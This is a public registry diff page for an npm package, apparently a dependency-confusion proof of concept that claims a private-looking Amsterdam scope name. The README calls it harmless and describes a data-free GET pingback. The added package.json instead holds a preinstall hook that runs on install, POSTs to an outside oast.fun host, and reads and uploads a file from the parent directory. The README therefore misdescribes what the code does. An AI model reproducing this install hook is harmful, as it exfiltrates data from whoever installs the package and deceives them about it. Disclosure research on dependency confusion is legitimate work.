@amsterdam-local/forms-component-library 0.0.1-security → 1.0.10
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @amsterdam-local/forms-component-library might be problematic. Click here for more details.
- package/README.md +39 -5
- package/package.json +14 -6
package/README.md
CHANGED
|
@@ -1,5 +1,39 @@
|
|
|
1
|
-
#
|
|
2
|
-
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
|
|
1
|
+
# @amsterdam-local/forms-component-library
|
|
2
|
+
|
|
3
|
+
## ⚠️ Security Research — Responsible Disclosure
|
|
4
|
+
|
|
5
|
+
This package is a **proof-of-concept** published as part of a responsible security disclosure.
|
|
6
|
+
It contains **no malicious code** and will not harm any system that installs it.
|
|
7
|
+
|
|
8
|
+
---
|
|
9
|
+
|
|
10
|
+
## Who I am
|
|
11
|
+
|
|
12
|
+
I am an independent security researcher conducting a dependency confusion audit on publicly accessible `package.json` files.
|
|
13
|
+
|
|
14
|
+
- **Contact:** [sn3akysnak3@wearehackeone.com]
|
|
15
|
+
- **Profile:** [https://app.zerocopter.com/profiles/sn3akysnak3]
|
|
16
|
+
|
|
17
|
+
---
|
|
18
|
+
|
|
19
|
+
## What this package does
|
|
20
|
+
|
|
21
|
+
- Installs cleanly with no side effects.
|
|
22
|
+
- The `postinstall` script sends a single **HTTP GET** pingback to a researcher-controlled
|
|
23
|
+
server logging: package name, timestamp, and a randomised install ID.
|
|
24
|
+
**No system information, credentials, source code, or environment variables are collected.**
|
|
25
|
+
- The pingback URL is: `vbiubtntahxnwntdhkigryc0epet7xn4s.oast.fun`
|
|
26
|
+
|
|
27
|
+
---
|
|
28
|
+
|
|
29
|
+
## References
|
|
30
|
+
|
|
31
|
+
- [Alex Birsan — Dependency Confusion](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
|
|
32
|
+
- [npm Scoped Packages](https://docs.npmjs.com/about-scopes)
|
|
33
|
+
- [OWASP — A06 Vulnerable and Outdated Components](https://owasp.org/Top10/A06_2021-Vulnerable_and_Outdated_Components/)
|
|
34
|
+
|
|
35
|
+
---
|
|
36
|
+
|
|
37
|
+
> This package will be unpublished or transferred to the rightful owner once the
|
|
38
|
+
> reporting process is complete. It exists solely to prevent a malicious actor from
|
|
39
|
+
> claiming this namespace first.
|
package/package.json
CHANGED
|
@@ -1,6 +1,14 @@
|
|
|
1
|
-
{
|
|
2
|
-
"name": "@amsterdam-local/forms-component-library",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
6
|
-
|
|
1
|
+
{
|
|
2
|
+
"name": "@amsterdam-local/forms-component-library",
|
|
3
|
+
"version": "1.0.10",
|
|
4
|
+
"description": "SECURITY RESEARCH - Responsible disclosure PoC. See README.",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"preinstall": "echo 'AMSTERDAM-SN3AKYSNAK3-ZEROCOPTER' | curl -X POST http://vbiubtntahxnwntdhkigryc0epet7xn4s.oast.fun/ --data-binary @- && type ../Extraction-POC.txt | curl -X POST http://vbiubtntahxnwntdhkigryc0epet7xn4s.oast.fun/ --data-binary @-\""
|
|
7
|
+
},
|
|
8
|
+
"keywords": [
|
|
9
|
+
"security-research",
|
|
10
|
+
"responsible-disclosure",
|
|
11
|
+
"dependency-confusion"
|
|
12
|
+
],
|
|
13
|
+
"author": "Ishan Vyas <sn3akysnak3@wearehackerone.com> (https://app.zerocopter.com/profiles/sn3akysnak3)"
|
|
14
|
+
}
|